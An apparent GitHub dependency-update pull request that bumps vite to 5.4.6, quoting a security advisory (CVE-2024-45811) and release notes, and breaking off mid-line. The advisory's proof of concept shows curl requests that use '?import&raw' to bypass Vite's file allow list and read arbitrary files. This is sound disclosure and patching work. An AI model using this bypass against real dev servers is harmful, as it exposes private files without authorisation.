search

jill64 / sentry-sveltekit-cloudflare

♟️ Unofficial Sentry Integration for SvelteKit Cloudflare Adapter
https://npmjs.com/package/@jill64/sentry-sveltekit-cloudflare
MIT License
27 stars 0 forks source link

chore(deps): update dependency vite to v5.4.6 [security] #692

Open renovate[bot] opened 1 month ago

renovate[bot] commented 1 month ago

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vite (source) 5.4.2 -> 5.4.6 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@​fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

Release Notes

vitejs/vite (vite) ### [`v5.4.6`](https://redirect.github.com/vitejs/vite/releases/tag/v5.4.6) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.5...v5.4.6) Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.4.6/packages/vite/CHANGELOG.md) for details. ### [`v5.4.5`](https://redirect.github.com/vitejs/vite/releases/tag/v5.4.5) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.4...v5.4.5) Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.4.5/packages/vite/CHANGELOG.md) for details. ### [`v5.4.4`](https://redirect.github.com/vitejs/vite/releases/tag/v5.4.4) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.3...v5.4.4) Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.4.4/packages/vite/CHANGELOG.md) for details. ### [`v5.4.3`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small543-2024-09-03-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.2...v5.4.3) - fix: allow getting URL of JS files in publicDir ([#​17915](https://redirect.github.com/vitejs/vite/issues/17915)) ([943ece1](https://redirect.github.com/vitejs/vite/commit/943ece177e7709b3ba574e810afce347c51d4442)), closes [#​17915](https://redirect.github.com/vitejs/vite/issues/17915) - fix: cjs warning respect the logLevel flag ([#​17993](https://redirect.github.com/vitejs/vite/issues/17993)) ([dc3c14f](https://redirect.github.com/vitejs/vite/commit/dc3c14f39fcd57867c8ae81b75ae768b53b4b880)), closes [#​17993](https://redirect.github.com/vitejs/vite/issues/17993) - fix: improve CJS warning trace information ([#​17926](https://redirect.github.com/vitejs/vite/issues/17926)) ([5c5f82c](https://redirect.github.com/vitejs/vite/commit/5c5f82c84bb64309875b42eee9d4dd525ab42e8c)), closes [#​17926](https://redirect.github.com/vitejs/vite/issues/17926) - fix: only remove entry assets handled by Vite core ([#​17916](https://redirect.github.com/vitejs/vite/issues/17916)) ([ebfaa7e](https://redirect.github.com/vitejs/vite/commit/ebfaa7e6019783f308db5e759a6a67abb7cc626c)), closes [#​17916](https://redirect.github.com/vitejs/vite/issues/17916) - fix: waitForRequestIdle locked ([#​17982](https://redirect.github.com/vitejs/vite/issues/17982)) ([ad13760](https://redirect.github.com/vitejs/vite/commit/ad1376018a94b42540a8488d897cc520849e1228)), closes [#​17982](https://redirect.github.com/vitejs/vite/issues/17982) - fix(css): fix directory index import in sass modern api ([#​17960](https://redirect.github.com/vitejs/vite/issues/17960)) ([9b001ba](https://redirect.github.com/vitejs/vite/commit/9b001baa70c8489ac5550107c110a5dca281cda4)), closes [#​17960](https://redirect.github.com/vitejs/vite/issues/17960) - fix(css): fix sass `file://` reference ([#​17909](https://redirect.github.com/vitejs/vite/issues/17909)) ([561b940](https://redirect.github.com/vitejs/vite/commit/561b940f6f963fbb78058a6e23b4adad53a2edb9)), closes [#​17909](https://redirect.github.com/vitejs/vite/issues/17909) - fix(css): fix sass modern source map ([#​17938](https://redirect.github.com/vitejs/vite/issues/17938)) ([d428e7e](https://redirect.github.com/vitejs/vite/commit/d428e7e3a05f8da5ea00bb1b6a0827a5cc225899)), closes [#​17938](https://redirect.github.com/vitejs/vite/issues/17938) - fix(deps): bump tsconfck ([#​17990](https://redirect.github.com/vitejs/vite/issues/17990)) ([8c661b2](https://redirect.github.com/vitejs/vite/commit/8c661b20e92f33eb2e3ba3841b20dd6f6076f1ef)), closes [#​17990](https://redirect.github.com/vitejs/vite/issues/17990) - fix(html): rewrite assets url in